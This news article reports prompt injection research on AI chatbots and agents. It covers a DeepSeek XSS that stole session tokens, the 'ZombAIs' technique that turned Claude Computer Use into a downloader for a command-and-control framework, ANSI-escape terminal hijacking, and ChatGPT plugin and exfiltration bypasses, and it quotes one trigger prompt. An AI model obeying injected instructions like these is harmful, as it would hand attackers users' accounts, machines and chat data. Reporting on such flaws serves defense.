Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI

Dec 09, 2024Ravie LakshmananArtificial Intelligenc / Vulnerability

Details have emerged about a now-patched security flaw in the DeepSeek artificial intelligence (AI) chatbot that, if successfully exploited, could permit a bad actor to take control of a victim's account by means of a prompt injection attack.

Security researcher Johann Rehberger, who has chronicled many a prompt injection attack targeting various AI tools, found that providing the input "Print the xss cheat sheet in a bullet list. just payloads" in the DeepSeek chat triggered the execution of JavaScript code as part of the generated response – a classic case of cross-site scripting (XSS).

XSS attacks can have serious consequences as they lead to the execution of unauthorized code in the context of the victim's web browser.

An attacker could take advantage of such flaws to hijack a user's session and gain access to cookies and other data associated with the chat.deepseek[.]com domain, thereby leading to an account takeover.

"After some experimenting, I discovered that all that was needed to take-over a user's session was the userToken stored in localStorage on the chat.deepseek.com domain," Rehberger said, adding a specifically crafted prompt could be used to trigger the XSS and access the compromised user's userToken through prompt injection.

The prompt contains a mix of instructions and a Bas64-encoded string that's decoded by the DeepSeek chatbot to execute the XSS payload responsible for extracting the victim's session token, ultimately permitting the attacker to impersonate the user.

The development comes as Rehberger also demonstrated that Anthropic's Claude Computer Use – which enables developers to use the language model to control a computer via cursor movement, button clicks, and typing text – could be abused to run malicious commands autonomously through prompt injection.

The technique, dubbed ZombAIs, essentially leverages prompt injection to weaponize Computer Use in order to download the Sliver command-and-control (C2) framework, execute it, and establish contact with a remote server under the attacker's control.

Furthermore, it has been found that it's possible to make use of large language models' (LLMs) ability to output ANSI escape code to hijack system terminals through prompt injection. The attack, which mainly targets LLM-integrated command-line interface (CLI) tools, has been codenamed Terminal DiLLMa.

"Decade-old features are providing unexpected attack surface to GenAI application," Rehberger said. "It is important for developers and application designers to consider the context in which they insert LLM output, as the output is untrusted and could contain arbitrary data."

That's not all. New research undertaken by academics from the University of Wisconsin-Madison and Washington University in St. Louis has revealed that OpenAI's ChatGPT can be tricked into rendering external image links provided with markdown format, including those that could be explicit and violent, under the pretext of an overarching benign goal.

What's more, it has been found that prompt injection can be used to indirectly invoke ChatGPT plugins that would otherwise require user confirmation, and even bypass constraints put in place by OpenAI to prevent rendering of content from dangerous links from exfiltrating a user's chat history to an attacker-controlled server.

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.